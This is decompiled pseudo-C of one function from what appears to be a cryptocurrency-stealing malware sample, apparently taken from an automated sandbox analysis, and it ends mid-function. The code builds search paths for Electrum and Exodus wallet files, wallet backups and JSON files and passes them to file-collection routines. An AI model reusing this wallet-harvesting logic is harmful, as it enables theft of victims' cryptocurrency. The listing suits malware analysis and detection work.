			E00412D80(void* __ecx, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v280;
				char _v540;
				char _v800;
				char _v1060;
				char _v1320;
				char* _v1324;
				char* _v1328;
				intOrPtr _v1332;
				char* _v1336;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t489;
				char* _t493;
				char* _t496;
				char* _t499;
				char* _t504;
				char* _t507;
				char* _t510;
				char* _t514;
				char* _t517;
				char* _t520;
				char* _t525;
				char* _t528;
				char* _t531;
				char* _t536;
				char* _t539;
				char* _t542;
				char* _t547;
				char* _t550;
				char* _t553;
				char* _t557;
				char* _t560;
				char* _t564;
				char* _t568;
				char* _t571;
				char* _t575;
				char* _t579;
				char* _t582;
				char* _t586;
				char* _t590;
				char* _t593;
				char* _t596;
				char* _t601;
				char* _t604;
				char* _t607;
				char* _t611;
				char* _t615;
				char* _t618;
				char* _t622;
				char* _t626;
				char* _t629;
				char* _t633;
				char* _t637;
				char* _t640;
				char* _t644;
				char* _t648;
				char* _t651;
				char* _t655;
				char* _t659;
				char* _t662;
				char* _t666;
				char* _t670;
				char* _t673;
				char* _t677;
				char* _t680;
				char* _t684;
				char* _t688;
				char* _t691;
				char* _t694;
				intOrPtr _t699;
				intOrPtr _t701;
				intOrPtr _t704;
				intOrPtr _t706;
				intOrPtr _t717;
				intOrPtr _t720;
				intOrPtr _t723;
				intOrPtr _t726;
				intOrPtr _t732;
				intOrPtr _t735;
				void* _t755;
				void* _t757;
				char* _t759;
				intOrPtr _t762;
				intOrPtr _t764;
				intOrPtr _t768;
				intOrPtr _t774;
				intOrPtr _t776;
				intOrPtr _t779;
				intOrPtr _t782;
				intOrPtr _t784;
				intOrPtr _t787;
				intOrPtr _t790;
				intOrPtr _t792;
				intOrPtr _t797;
				intOrPtr _t801;
				intOrPtr _t803;
				intOrPtr _t805;
				intOrPtr _t809;
				intOrPtr _t811;
				intOrPtr _t813;
				intOrPtr _t817;
				intOrPtr _t819;
				intOrPtr _t821;
				intOrPtr _t826;
				intOrPtr _t828;
				intOrPtr _t832;
				intOrPtr _t835;
				intOrPtr _t838;
				intOrPtr _t840;
				intOrPtr _t843;
				intOrPtr _t846;
				intOrPtr _t848;
				intOrPtr _t851;
				intOrPtr _t854;
				intOrPtr _t856;
				intOrPtr _t859;
				intOrPtr _t862;
				intOrPtr _t864;
				intOrPtr _t867;
				intOrPtr _t870;
				intOrPtr _t872;
				intOrPtr _t875;
				intOrPtr _t878;
				intOrPtr _t880;
				intOrPtr _t883;
				intOrPtr _t887;
				intOrPtr _t889;
				intOrPtr _t894;
				intOrPtr _t896;
				intOrPtr _t900;
				intOrPtr _t901;
				intOrPtr _t902;
				intOrPtr _t904;
				intOrPtr _t915;
				intOrPtr _t939;
				intOrPtr _t941;
				intOrPtr _t942;
				intOrPtr _t943;
				void* _t959;
				void* _t961;
				void* _t962;
				void* _t963;
				void* _t964;
				signed int _t965;
				void* _t966;
				char* _t968;
				char* _t970;
				char* _t972;
				char* _t974;
				char* _t976;
				char* _t978;
				char* _t980;
				char* _t982;
				char* _t984;
				char* _t986;
				char* _t988;
				char* _t990;
				char* _t992;
				char* _t994;
				char* _t996;
				char* _t998;
				char* _t1000;
				char* _t1002;
				char* _t1004;
				char* _t1006;
				char* _t1008;
				char* _t1010;
				char* _t1012;
				char* _t1014;
				char* _t1016;
				char* _t1018;
				char* _t1020;
				char* _t1022;
				char* _t1024;
				char* _t1026;
				char* _t1028;
				char* _t1030;
				char* _t1032;
				char* _t1034;
				char* _t1036;
				char* _t1038;
				char* _t1040;
				char* _t1042;
				char* _t1044;
				char* _t1046;
				char* _t1048;
				char* _t1050;
				char* _t1052;
				char* _t1054;
				char* _t1056;
				char* _t1058;
				char* _t1060;
				char* _t1062;
				char* _t1064;
				char* _t1066;
				char* _t1068;
				char* _t1070;
				char* _t1072;
				char* _t1074;
				char* _t1076;
				char* _t1078;
				char* _t1080;
				void* _t1087;

				_t1087 = __eflags;
				_t489 =  *0x451f00; // 0xc21d6f0a
				_v20 = _t489 ^ _t965;
				 *[fs:0x0] =  &_v16;
				_t963 = __ecx;
				 *((intOrPtr*)(__ecx + 0x20)) = _a4;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				_t759 =  *0x45362c; // 0x25c1228
				_t968 = _t966 - 0x50c;
				_t493 = _t968;
				_v1336 = _t968;
				 *((intOrPtr*)(_t493 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t493 + 0x10)) = 0;
				_v1328 = _t759;
				_v1324 = _t493;
				 *_t493 = 0;
				E00404BC0(_v1324, _v1328, E0042BC70(_t759));
				_t762 =  *0x4535d8; // 0x25c04a0
				_t970 = _t968 + 4 - 0x1c;
				_t496 = _t970;
				_v1332 = _t970;
				 *((intOrPtr*)(_t496 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t496 + 0x10)) = 0;
				_v8 = 0;
				_v1324 = _t762;
				_v1328 = _t496;
				 *_t496 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t762));
				_t764 =  *0x453818; // 0x25c1340
				_t972 = _t970 + 4 - 0x1c;
				_t499 = _t972;
				_v1328 = _t972;
				 *((intOrPtr*)(_t499 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t499 + 0x10)) = 0;
				_v8 = 1;
				_v1324 = _t764;
				_v1328 = _t499;
				 *_t499 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t764));
				_v8 = 0xffffffff;
				E00412570(_t963); // executed
				_t974 = _t972 + 4 - 0x1c;
				_t504 = _t974;
				_v1332 = _t974;
				 *((intOrPtr*)(_t504 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t504 + 0x10)) = 0;
				_v1324 = _t504;
				 *_t504 = 0;
				E00404BC0(_v1324, "*.*", E0042BC70("*.*"));
				_v8 = 2;
				_t768 =  *0x45371c; // 0x25c1310
				_t976 = _t974 + 4 - 0x1c;
				_t507 = _t976;
				_v1336 = _t976;
				 *((intOrPtr*)(_t507 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t507 + 0x10)) = 0;
				_v1324 = _t768;
				_v1328 = _t507;
				 *_t507 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t768));
				_t978 = _t976 + 4 - 0x1c;
				_t510 = _t978;
				_v1324 = _t978;
				 *((intOrPtr*)(_t510 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t510 + 0x10)) = 0;
				_v8 = 3;
				_v1324 = _t510;
				 *_t510 = 0;
				E00404BC0(_v1324, "\\Electrum\\wallets\\", E0042BC70("\\Electrum\\wallets\\"));
				_v8 = 0xffffffff;
				E00412570(_t963); // executed
				_t980 = _t978 + 4 - 0x1c;
				_t514 = _t980;
				_v1332 = _t980;
				 *((intOrPtr*)(_t514 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t514 + 0x10)) = 0;
				_v1324 = _t514;
				 *_t514 = 0;
				E00404BC0(_v1324, "*.*", E0042BC70("*.*"));
				_t774 =  *0x4535c4; // 0x25c1268
				_t982 = _t980 + 4 - 0x1c;
				_t517 = _t982;
				_v1336 = _t982;
				 *((intOrPtr*)(_t517 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t517 + 0x10)) = 0;
				_v8 = 4;
				_v1324 = _t774;
				_v1328 = _t517;
				 *_t517 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t774));
				_t776 =  *0x4535ac; // 0x25c04d8
				_t984 = _t982 + 4 - 0x1c;
				_t520 = _t984;
				_v1328 = _t984;
				 *((intOrPtr*)(_t520 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t520 + 0x10)) = 0;
				_v8 = 5;
				_v1324 = _t776;
				_v1328 = _t520;
				 *_t520 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t776));
				_v8 = 0xffffffff;
				E00412570(_t963);
				_t779 =  *0x453a98; // 0x25c0508
				_t986 = _t984 + 4 - 0x1c;
				_t525 = _t986;
				_v1332 = _t986;
				 *((intOrPtr*)(_t525 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t525 + 0x10)) = 0;
				_v1324 = _t779;
				_v1328 = _t525;
				 *_t525 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t779));
				_t782 =  *0x453514; // 0x25c04f8
				_t988 = _t986 + 4 - 0x1c;
				_t528 = _t988;
				_v1336 = _t988;
				 *((intOrPtr*)(_t528 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t528 + 0x10)) = 0;
				_v8 = 6;
				_v1324 = _t782;
				_v1328 = _t528;
				 *_t528 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t782));
				_t784 =  *0x453988; // 0x25c12b0
				_t990 = _t988 + 4 - 0x1c;
				_t531 = _t990;
				_v1328 = _t990;
				 *((intOrPtr*)(_t531 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t531 + 0x10)) = 0;
				_v8 = 7;
				_v1324 = _t784;
				_v1328 = _t531;
				 *_t531 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t784));
				_v8 = 0xffffffff;
				E00412570(_t963);
				_t787 =  *0x4536f4; // 0x25c0528
				_t992 = _t990 + 4 - 0x1c;
				_t536 = _t992;
				_v1332 = _t992;
				 *((intOrPtr*)(_t536 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t536 + 0x10)) = 0;
				_v1324 = _t787;
				_v1328 = _t536;
				 *_t536 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t787));
				_t790 =  *0x453514; // 0x25c04f8
				_t994 = _t992 + 4 - 0x1c;
				_t539 = _t994;
				_v1336 = _t994;
				 *((intOrPtr*)(_t539 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t539 + 0x10)) = 0;
				_v8 = 8;
				_v1324 = _t790;
				_v1328 = _t539;
				 *_t539 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t790));
				_t792 =  *0x453988; // 0x25c12b0
				_t996 = _t994 + 4 - 0x1c;
				_t542 = _t996;
				_v1328 = _t996;
				 *((intOrPtr*)(_t542 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t542 + 0x10)) = 0;
				_v8 = 9;
				_v1324 = _t792;
				_v1328 = _t542;
				 *_t542 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t792));
				_v8 = 0xffffffff;
				E00412570(_t963); // executed
				_t998 = _t996 + 4 - 0x1c;
				_t547 = _t998;
				_v1332 = _t998;
				 *((intOrPtr*)(_t547 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t547 + 0x10)) = 0;
				_v1324 = _t547;
				 *_t547 = 0;
				E00404BC0(_v1324, "*.*", E0042BC70("*.*"));
				_t1000 = _t998 + 4 - 0x1c;
				_t550 = _t1000;
				_v1336 = _t1000;
				 *((intOrPtr*)(_t550 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t550 + 0x10)) = 0;
				_v8 = 0xa;
				_v1324 = _t550;
				 *_t550 = 0;
				E00404BC0(_v1324, "Exodus\\exodus.wallet", E0042BC70("Exodus\\exodus.wallet"));
				_v8 = 0xb;
				_t797 =  *0x453530; // 0x25c0548
				_t1002 = _t1000 + 4 - 0x1c;
				_t553 = _t1002;
				_v1328 = _t1002;
				 *((intOrPtr*)(_t553 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t553 + 0x10)) = 0;
				_v1324 = _t797;
				_v1328 = _t553;
				 *_t553 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t797));
				_v8 = 0xffffffff;
				E00412570(_t963);
				_t801 =  *0x453a2c; // 0x25c13a0
				_t1004 = _t1002 + 4 - 0x1c;
				_t557 = _t1004;
				_v1332 = _t1004;
				 *((intOrPtr*)(_t557 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t557 + 0x10)) = 0;
				_v1324 = _t801;
				_v1328 = _t557;
				 *_t557 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t801));
				_t803 =  *0x453a78; // 0x25c1298
				_t1006 = _t1004 + 4 - 0x1c;
				_t560 = _t1006;
				_v1336 = _t1006;
				 *((intOrPtr*)(_t560 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t560 + 0x10)) = 0;
				_v8 = 0xc;
				_v1324 = _t803;
				_v1328 = _t560;
				 *_t560 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t803));
				_t805 =  *0x453900; // 0x25c0568
				_t1008 = _t1006 + 4 - 0x1c;
				_t564 = _t1008;
				_v1328 = _t1008;
				 *((intOrPtr*)(_t564 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t564 + 0x10)) = 0;
				_v8 = 0xd;
				_v1324 = _t805;
				_v1328 = _t564;
				 *_t564 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t805));
				_v8 = 0xffffffff;
				E00412570(_t963);
				_t809 =  *0x4538e8; // 0x25c5f00
				_t1010 = _t1008 + 4 - 0x1c;
				_t568 = _t1010;
				_v1332 = _t1010;
				 *((intOrPtr*)(_t568 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t568 + 0x10)) = 0;
				_v1324 = _t809;
				_v1328 = _t568;
				 *_t568 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t809));
				_t811 =  *0x453b1c; // 0x25c1388
				_t1012 = _t1010 + 4 - 0x1c;
				_t571 = _t1012;
				_v1336 = _t1012;
				 *((intOrPtr*)(_t571 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t571 + 0x10)) = 0;
				_v8 = 0xe;
				_v1324 = _t811;
				_v1328 = _t571;
				 *_t571 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t811));
				_t813 =  *0x453658; // 0x25c1400
				_t1014 = _t1012 + 4 - 0x1c;
				_t575 = _t1014;
				_v1328 = _t1014;
				 *((intOrPtr*)(_t575 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t575 + 0x10)) = 0;
				_v8 = 0xf;
				_v1324 = _t813;
				_v1328 = _t575;
				 *_t575 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t813));
				_v8 = 0xffffffff;
				E00412570(_t963);
				_t817 =  *0x4534dc; // 0x25c5ee0
				_t1016 = _t1014 + 4 - 0x1c;
				_t579 = _t1016;
				_v1332 = _t1016;
				 *((intOrPtr*)(_t579 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t579 + 0x10)) = 0;
				_v1324 = _t817;
				_v1328 = _t579;
				 *_t579 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t817));
				_t819 =  *0x4537d0; // 0x25c5e00
				_t1018 = _t1016 + 4 - 0x1c;
				_v8 = 0x10;
				_v1324 = _t819;
				_v1336 = _t1018;
				_t582 = _t1018;
				 *((intOrPtr*)(_t582 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t582 + 0x10)) = 0;
				_v1328 = _t582;
				 *_t582 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t819));
				_t821 =  *0x453a14; // 0x25c5e60
				_t1020 = _t1018 + 4 - 0x1c;
				_t586 = _t1020;
				_v1328 = _t1020;
				 *((intOrPtr*)(_t586 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t586 + 0x10)) = 0;
				_v8 = 0x11;
				_v1324 = _t821;
				_v1328 = _t586;
				 *_t586 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t821));
				_v8 = 0xffffffff;
				E00412570(_t963); // executed
				_t1022 = _t1020 + 4 - 0x1c;
				_t590 = _t1022;
				_v1332 = _t1022;
				 *((intOrPtr*)(_t590 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t590 + 0x10)) = 0;
				_v1324 = _t590;
				 *_t590 = 0;
				E00404BC0(_v1324, "*.*", E0042BC70("*.*"));
				_t826 =  *0x453400; // 0x25c8c00
				_t1024 = _t1022 + 4 - 0x1c;
				_t593 = _t1024;
				_v1336 = _t1024;
				 *((intOrPtr*)(_t593 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t593 + 0x10)) = 0;
				_v8 = 0x12;
				_v1324 = _t826;
				_v1328 = _t593;
				 *_t593 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t826));
				_t828 =  *0x453acc; // 0x25c8e70
				_t1026 = _t1024 + 4 - 0x1c;
				_t596 = _t1026;
				_v1328 = _t1026;
				 *((intOrPtr*)(_t596 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t596 + 0x10)) = 0;
				_v8 = 0x13;
				_v1324 = _t828;
				_v1328 = _t596;
				 *_t596 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t828));
				_v8 = 0xffffffff;
				E00412570(_t963); // executed
				_t1028 = _t1026 + 4 - 0x1c;
				_t601 = _t1028;
				_v1332 = _t1028;
				 *((intOrPtr*)(_t601 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t601 + 0x10)) = 0;
				_v1324 = _t601;
				 *_t601 = 0;
				E00404BC0(_v1324, "*.*", E0042BC70("*.*"));
				_t832 =  *0x45368c; // 0x25c0588
				_t1030 = _t1028 + 4 - 0x1c;
				_t604 = _t1030;
				_v1336 = _t1030;
				 *((intOrPtr*)(_t604 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t604 + 0x10)) = 0;
				_v8 = 0x14;
				_v1324 = _t832;
				_v1328 = _t604;
				 *_t604 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t832));
				_t835 =  *0x4534d0; // 0x25c1448
				_t1032 = _t1030 + 4 - 0x1c;
				_t607 = _t1032;
				_v1328 = _t1032;
				 *((intOrPtr*)(_t607 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t607 + 0x10)) = 0;
				_v8 = 0x15;
				_v1324 = _t835;
				_v1328 = _t607;
				 *_t607 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t835));
				_v8 = 0xffffffff;
				E00412570(_t963);
				_t838 =  *0x453a60; // 0x25c12f8
				_t1034 = _t1032 + 4 - 0x1c;
				_t611 = _t1034;
				_v1332 = _t1034;
				 *((intOrPtr*)(_t611 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t611 + 0x10)) = 0;
				_v1324 = _t838;
				_v1328 = _t611;
				 *_t611 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t838));
				_t840 =  *0x453b28; // 0x25ca348
				_t1036 = _t1034 + 4 - 0x1c;
				_t615 = _t1036;
				_v1336 = _t1036;
				 *((intOrPtr*)(_t615 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t615 + 0x10)) = 0;
				_v8 = 0x16;
				_v1324 = _t840;
				_v1328 = _t615;
				 *_t615 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t840));
				_t843 =  *0x453b18; // 0x25c1358
				_t1038 = _t1036 + 4 - 0x1c;
				_t618 = _t1038;
				_v1328 = _t1038;
				 *((intOrPtr*)(_t618 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t618 + 0x10)) = 0;
				_v8 = 0x17;
				_v1324 = _t843;
				_v1328 = _t618;
				 *_t618 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t843));
				_v8 = 0xffffffff;
				E00412570(_t963);
				_t846 =  *0x4538d0; // 0x25c99c8
				_t1040 = _t1038 + 4 - 0x1c;
				_t622 = _t1040;
				_v1332 = _t1040;
				 *((intOrPtr*)(_t622 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t622 + 0x10)) = 0;
				_v1324 = _t846;
				_v1328 = _t622;
				 *_t622 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t846));
				_t848 =  *0x453b28; // 0x25ca348
				_t1042 = _t1040 + 4 - 0x1c;
				_t626 = _t1042;
				_v1336 = _t1042;
				 *((intOrPtr*)(_t626 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t626 + 0x10)) = 0;
				_v8 = 0x18;
				_v1324 = _t848;
				_v1328 = _t626;
				 *_t626 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t848));
				_t851 =  *0x453b18; // 0x25c1358
				_t1044 = _t1042 + 4 - 0x1c;
				_t629 = _t1044;
				_v1328 = _t1044;
				 *((intOrPtr*)(_t629 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t629 + 0x10)) = 0;
				_v8 = 0x19;
				_v1324 = _t851;
				_v1328 = _t629;
				 *_t629 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t851));
				_v8 = 0xffffffff;
				E00412570(_t963);
				_t854 =  *0x45356c; // 0x25c97c8
				_t1046 = _t1044 + 4 - 0x1c;
				_t633 = _t1046;
				_v1332 = _t1046;
				 *((intOrPtr*)(_t633 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t633 + 0x10)) = 0;
				_v1324 = _t854;
				_v1328 = _t633;
				 *_t633 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t854));
				_t856 =  *0x453b28; // 0x25ca348
				_t1048 = _t1046 + 4 - 0x1c;
				_t637 = _t1048;
				_v1336 = _t1048;
				 *((intOrPtr*)(_t637 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t637 + 0x10)) = 0;
				_v8 = 0x1a;
				_v1324 = _t856;
				_v1328 = _t637;
				 *_t637 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t856));
				_t859 =  *0x453b18; // 0x25c1358
				_t1050 = _t1048 + 4 - 0x1c;
				_t640 = _t1050;
				_v1328 = _t1050;
				 *((intOrPtr*)(_t640 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t640 + 0x10)) = 0;
				_v8 = 0x1b;
				_v1324 = _t859;
				_v1328 = _t640;
				 *_t640 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t859));
				_v8 = 0xffffffff;
				E00412570(_t963, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, _t489 ^ _t965, _t959, _t962, _t755,  *[fs:0x0], E0043EBC2, 0xffffffff);
				_t862 =  *0x453aa0; // 0x25c13b8
				_t1052 = _t1050 + 4 - 0x1c;
				_t644 = _t1052;
				_v1332 = _t1052;
				 *((intOrPtr*)(_t644 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t644 + 0x10)) = 0;
				_v1324 = _t862;
				_v1328 = _t644;
				 *_t644 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t862));
				_t864 =  *0x45344c; // 0x25c14b0
				_t1054 = _t1052 + 4 - 0x1c;
				_t648 = _t1054;
				_v1336 = _t1054;
				 *((intOrPtr*)(_t648 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t648 + 0x10)) = 0;
				_v8 = 0x1c;
				_v1324 = _t864;
				_v1328 = _t648;
				 *_t648 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t864));
				_t867 =  *0x45352c; // 0x25c14c0
				_t1056 = _t1054 + 4 - 0x1c;
				_t651 = _t1056;
				_v1328 = _t1056;
				 *((intOrPtr*)(_t651 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t651 + 0x10)) = 0;
				_v8 = 0x1d;
				_v1324 = _t867;
				_v1328 = _t651;
				 *_t651 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t867));
				_v8 = 0xffffffff;
				E00412570(_t963);
				_t870 =  *0x45378c; // 0x25c1328
				_t1058 = _t1056 + 4 - 0x1c;
				_t655 = _t1058;
				_v1332 = _t1058;
				 *((intOrPtr*)(_t655 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t655 + 0x10)) = 0;
				_v1324 = _t870;
				_v1328 = _t655;
				 *_t655 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t870));
				_t872 =  *0x45344c; // 0x25c14b0
				_v8 = 0x1e;
				_v1324 = _t872;
				_t1060 = _t1058 + 4 - 0x1c;
				_t659 = _t1060;
				_v1336 = _t1060;
				 *((intOrPtr*)(_t659 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t659 + 0x10)) = 0;
				_v1328 = _t659;
				 *_t659 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t872));
				_t875 =  *0x45352c; // 0x25c14c0
				_t1062 = _t1060 + 4 - 0x1c;
				_t662 = _t1062;
				_v1328 = _t1062;
				 *((intOrPtr*)(_t662 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t662 + 0x10)) = 0;
				_v8 = 0x1f;
				_v1324 = _t875;
				_v1328 = _t662;
				 *_t662 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t875));
				_v8 = 0xffffffff;
				E00412570(_t963);
				_t878 =  *0x453570; // 0x25c8bd0
				_t1064 = _t1062 + 4 - 0x1c;
				_t666 = _t1064;
				_v1332 = _t1064;
				 *((intOrPtr*)(_t666 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t666 + 0x10)) = 0;
				_v1324 = _t878;
				_v1328 = _t666;
				 *_t666 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t878));
				_t880 =  *0x453880; // 0x25c7568
				_t1066 = _t1064 + 4 - 0x1c;
				_t670 = _t1066;
				_v1336 = _t1066;
				 *((intOrPtr*)(_t670 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t670 + 0x10)) = 0;
				_v8 = 0x20;
				_v1324 = _t880;
				_v1328 = _t670;
				 *_t670 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t880));
				_t883 =  *0x453820; // 0x25c6b38
				_t1068 = _t1066 + 4 - 0x1c;
				_v8 = 0x21;
				_v1324 = _t883;
				_v1328 = _t1068;
				_t673 = _t1068;
				 *((intOrPtr*)(_t673 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t673 + 0x10)) = 0;
				_v1328 = _t673;
				 *_t673 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t883));
				_v8 = 0xffffffff;
				E00412570(_t963); // executed
				_t1070 = _t1068 + 4 - 0x1c;
				_t677 = _t1070;
				_v1332 = _t1070;
				 *((intOrPtr*)(_t677 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t677 + 0x10)) = 0;
				_v1324 = _t677;
				 *_t677 = 0;
				E00404BC0(_v1324, "*.*", E0042BC70("*.*"));
				_t887 =  *0x453768; // 0x25c75e8
				_t1072 = _t1070 + 4 - 0x1c;
				_t680 = _t1072;
				_v1336 = _t1072;
				 *((intOrPtr*)(_t680 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t680 + 0x10)) = 0;
				_v8 = 0x22;
				_v1324 = _t887;
				_v1328 = _t680;
				 *_t680 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t887));
				_t889 =  *0x45346c; // 0x25c6ac0
				_t1074 = _t1072 + 4 - 0x1c;
				_t684 = _t1074;
				_v1328 = _t1074;
				 *((intOrPtr*)(_t684 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t684 + 0x10)) = 0;
				_v8 = 0x23;
				_v1324 = _t889;
				_v1328 = _t684;
				 *_t684 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t889));
				_v8 = 0xffffffff;
				E00412570(_t963); // executed
				_t1076 = _t1074 + 4 - 0x1c;
				_t688 = _t1076;
				_v1332 = _t1076;
				 *((intOrPtr*)(_t688 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t688 + 0x10)) = 0;
				_v1324 = _t688;
				 *_t688 = 0;
				E00404BC0(_v1324, "*.json", E0042BC70("*.json"));
				_t894 =  *0x4539cc; // 0x25c8cd8
				_t1078 = _t1076 + 4 - 0x1c;
				_t691 = _t1078;
				_v1336 = _t1078;
				 *((intOrPtr*)(_t691 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t691 + 0x10)) = 0;
				_v8 = 0x24;
				_v1324 = _t894;
				_v1328 = _t691;
				 *_t691 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t894));
				_t896 =  *0x453800; // 0x25c69a8
				_t1080 = _t1078 + 4 - 0x1c;
				_t694 = _t1080;
				_v1328 = _t1080;
				 *((intOrPtr*)(_t694 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t694 + 0x10)) = 0;
				_v8 = 0x25;
				_v1324 = _t896;
				_v1328 = _t694;
				 *_t694 = 0;
				E00404BC0(_v1328, _v1324, E0042BC70(_t896));
				_v8 = 0xffffffff;
				E00412570(_t963); // executed
				_t939 =  *0x453458; // 0x25ca2a0
				_t699 =  *0x453360; // 0x25ca2e8
				_t900 =  *0x45359c; // 0x25c9928
				E004118B0(_t1087, _t900, _t699, _t939,  *((intOrPtr*)(_t963 + 0x20)), 1); // executed
				_t701 =  *0x4533a0; // 0x25ca318
				_t901 =  *0x4537f4; // 0x25c99e8
				_t941 =  *0x453b64; // 0x25ca300
				E004118B0(_t1087, _t941, _t901, _t701,  *((intOrPtr*)(_t963 + 0x20)), 0); // executed
				_t902 =  *0x4533a0; // 0x25ca318
				_t942 =  *0x453668; // 0x25ca2d0
				_t704 =  *0x453434; // 0x25ca288
				E004118B0(_t1087, _t704, _t942, _t902,  *((intOrPtr*)(_t963 + 0x20)), 0); // executed
				_t943 =  *0x4533a0; // 0x25ca318
				_t706 =  *0x453a30; // 0x25ca2b8
				_t904 =  *0x453b20; // 0x25c8750
				E004118B0(_t1087, _t904, _t706, _t943,  *((intOrPtr*)(_t963 + 0x20)), 0); // executed
				E00411B90(0, _t1087, "\\Exodus\\backups", "Exodus\\backups", "*.*",  *((intOrPtr*)(_t963 + 0x20))); // executed
				E0042A2F0( &_v1060, 0, 0x104);
				E0042A2F0( &_v1320, 0, 0x104);
				E0042A2F0( &_v280, 0, 0x104);
				E0042A2F0( &_v800, 0, 0x104);
				E0042A2F0( &_v540, 0, 0x104);
				 *0x464860( &_v1060, "\\", 0, 1, 0, 1, 1);
				_t717 =  *0x453540; // 0x25ca330
				 *0x464860( &_v1060, _t717);
				 *0x464860( &_v1060, "\\");
				_t720 =  *0x453540; // 0x25ca330
